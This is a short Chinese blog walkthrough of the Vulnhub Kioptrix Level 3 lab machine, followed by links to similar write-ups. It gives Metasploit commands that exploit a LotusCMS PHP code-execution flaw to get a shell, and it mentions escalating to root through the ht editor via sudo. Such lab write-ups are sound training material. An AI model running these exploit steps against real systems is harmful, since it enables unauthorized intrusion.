Vulnhub靶机 kioptrix level 3

最新推荐文章于 2024-07-29 16:54:44 发布
最新推荐文章于 2024-07-29 16:54:44 发布
阅读量529 收藏 1
点赞数
分类专栏: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38005854/article/details/105390536
版权

在这里插入图片描述
简介里说了
先要配置hosts

在这里插入图片描述
找靶机扫端口
80 22

在这里插入图片描述
在这里插入图片描述
登录界面
LotusCMS

在这里插入图片描述
搜漏洞

searchsploit Lotus

在这里插入图片描述
直接msf
设置RHOSTS、URI

search lotus
use exploit/multi/http/lcms_php_exec
show options
set RHOSTS 192.168.0.128
set URI /
run

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

提示用sudo ht
一个mysql账号

在这里插入图片描述
在这里插入图片描述

找到账号密码

在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这个靶机的解法不止一种

菜浪马废
关注
专栏目录
Kioptrix Level 3 靶机wp
m0_52496313的博客
08-14 358
Kioptrix Level 3 靶机wp
Vulnhub系列-Kioptrix-Level-3
Yasso的博客
12-19 1344
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Kioptrix Level 1~4
cht6667的博客
02-17 904
Kioptrix Level1~4打靶笔记
VulnHub靶机入门篇--kioptrix.level 3
最新发布
2302_78903258的博客
07-29 999
发现有一个login的登录框,可能存在sql注入漏洞,或者弱口令,并且发现这里有一个LotusCMS,网上查找一个信息,看看有没有相关的漏洞。这边可以看到URI为/lcms/但是我本地是没有这个路径的,所以我们这里需要设置下RHOSTS和URI。使用如下命令选择此 Auxiliary,或者使用命令。这里一直没有什么反应,可能是脚本的原因,用。哎,还是失败 ,查看原因,说使用Nat模式。使用msfconsole命令进入msf6。好像并没有什么用,只能看看80端口的服务。使用第14个的命令或者使用命令。
VulnHub——Kioptrix Level 3
江左盟的博客
05-28 3023
目录 简介 信息收集 漏洞检测与利用 权限提升 总结 简介 该靶机还是一如既往的简单,通过信息收集发现Web服务使用LotusCMS,使用Google搜索发现存在已知漏洞,通过漏洞利用脚本获得webshell,然后通过内核漏洞直接提升权限到root。 信息收集 探测目标主机IP地址,如图: 然后对目标主机进行快速端口扫描,发现开启22和80端口,OpenSSH版本4.7p1,Apache版本2.2.8,PHP版本5.2.4-2,操作系统可能为Debian或Ubuntu,内核版本为2.
渗透测试靶机---Kioptrix Level 3
久恙502的博客
07-19 325
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇
qq_27466929的博客
08-25 891
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1
KIOPTRIX: LEVEL 1-VulnHub靶机学习第二篇
qq_27466929的博客
08-23 542
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1
KIOPTRIX: LEVEL 1.3-VulnHub靶机学习第五篇
qq_27466929的博客
09-11 1274
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.3
KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇
qq_27466929的博客
09-04 1100
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.2
Kioptrix: Level 3靶机实战 lotu cms +sql注入 getshell ht编辑器有root权限,修改/etc/sudoers文件使当前用户具有root权限 提权
YouthBelief的博客
11-25 2377
Kioptrix: Level 3靶机实战前言0x01 信息收集1.1 探测靶机ip1.2 nmap探测端口1.3 目录遍历0x02 漏洞探测2.1 访问 80端口2.1.1 登录功能查看2.1.1.1cms漏洞搜索2.1.1.2 msf利用2.1.2 点击网页功能点2.1.2.1列数和回显点数据库数据表可能存在用户名密码的表的字段账号密码或者用sqlmap2.1.3 登录loneferret账号0x03 提权 前言 Kioptrix: Level 3 (#1): 靶机地址 https://www.vu
vuInhub靶场实战系列--Kioptrix Level #3
weixin_45221204的博客
06-10 1344
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍Kioptrix Level #3靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、netcat、msf反弹shell、脚本利用、利用脚本进行linux内核提权等内容。452 MegsHave funp=358主机发现目录扫描端口扫描。
vulnhub靶机测试--Kioptrix 3
ximo的博客
03-25 480
目录前言信息收集主机发现端口扫描目录扫描漏洞利用提权总结 前言 这个系列基本上没有web方面的漏洞,都是系统、CMS版本漏洞;主要是了解一下提权方法。 信息收集 主机发现 端口扫描 目录扫描 漏洞利用 访问80端口: 第一个页面有个page参数,试了试文件包含,失败。 第二个页面有个system参数,命令执行漏洞?? 失败。 第三个页面是一个登录页面,同时知道了CMS。 再看看其他目录: 1.数据库登录后台 2.一个看不懂的(没加载,速度慢的网页): 3.目录遍历,但是啥用没有。 查找CMS
Kioptrix-3 ( 补漏 )
猎荒者
03-18 961
淫漫则不能励精,险躁则不能治性。 上次目录扫描得到数据库登录界面和用户登录界面,普通的字典爆破思路不可取,所以接下来是通过挖掘 web 漏洞得到用户登录的账密。 在 /gallery 目录找到一个疑似 SQL 注入漏洞 使用 sqlmap 对目标 URL 进行漏扫 PS: 使用 sqlmap 之前现在 Kali 的 /etc/hosts 文件中添加进靶机 IP 和域名的映射,不然可能扫不出...
KIOPTRIX: LEVEL 3通关详解
arcuied
04-05 214
KIOPTRIX: LEVEL 3通关详解
Vulnhub系列:kioptrixVM3
Fuzz
08-10 2517
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为OSCP做打基础。 下载链接 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ 运行环境 kali:192.168.44.128 靶机:192.168.44.134 相关知识点 0x00、信息收集 主机发现:nmap -sP 192.168.44.0/24 端口扫描:nmap -sS -sV 192.168.44.134 0
学习笔记-Kioptrix3-WalkThrough
人饭子的博客
11-03 265
Kioptrix3-WalkThrough 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 靶机地址 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ Description It's been a while since the last Kioptrix VM c...
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值